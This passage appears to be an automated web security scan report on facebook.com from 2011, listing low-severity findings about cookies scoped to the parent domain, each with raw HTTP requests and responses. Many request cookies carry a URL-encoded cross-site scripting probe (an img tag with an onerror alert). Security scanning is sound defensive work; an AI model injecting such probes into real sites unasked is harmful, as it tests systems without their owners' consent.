Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.17. http://www.facebook.com/AOLrealestate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/AOLrealestate

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AOLrealestate HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.18. http://www.facebook.com/BPAmerica previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BPAmerica

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.19. http://www.facebook.com/DailyFinance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/DailyFinance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DailyFinance HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.20. http://www.facebook.com/HockeyKen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HockeyKen

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HockeyKen HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.21. http://www.facebook.com/KickIceForever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/KickIceForever

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /KickIceForever HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.22. http://www.facebook.com/LadyBonesie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/LadyBonesie

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LadyBonesie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.23. http://www.facebook.com/Loizza previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Loizza

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Loizza HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.24. http://www.facebook.com/aim previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aim

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aim HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.25. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.123
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 41058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.26. http://www.facebook.com/ajax/reg_birthday_help.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/reg_birthday_help.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/reg_birthday_help.php?__a=1&__d=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 707
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.163.55
X-Cnection: close
Date: Thu, 05 May 2011 11:43:24 GMT

for (;;);{"__ar":1,"payload":{"secure":false,"title":{"__html":"Why do I need to provide my birthday?"},"className":"birthday_warning_popup","body":{"__html":"Facebook requires all users to provide th
...[SNIP]...

10.27. http://www.facebook.com/ajax/register/logging.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/register/logging.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ajax/register/logging.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
Origin: http://www.facebook.com
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613617025%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613618111%2C%22act%22%2C1304613617025%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fajax%2Freg_birthday_help.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C437%2C508%2C12%2C981%2C16%5D
Content-Length: 111

action=postload_focus&reg_instance=nozCTU1UnNH2U_CPdhUk4wOq&abtest_registration_group=1&fb_dtsg=yeP5w&lsd=zTWKd

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 34
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.198.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:30 GMT

for (;;);{"__ar":1,"payload":null}

10.28. http://www.facebook.com/aol previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aol

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aol HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.29. http://www.facebook.com/aolradio previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aolradio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aolradio HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.30. http://www.facebook.com/badges previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badges HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.119
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 0

10.31. http://www.facebook.com/burkerkink previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/burkerkink

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /burkerkink HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.32. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.222.101
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 0

10.33. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.34. http://www.facebook.com/deedee.perez1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/deedee.perez1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deedee.perez1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.35. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
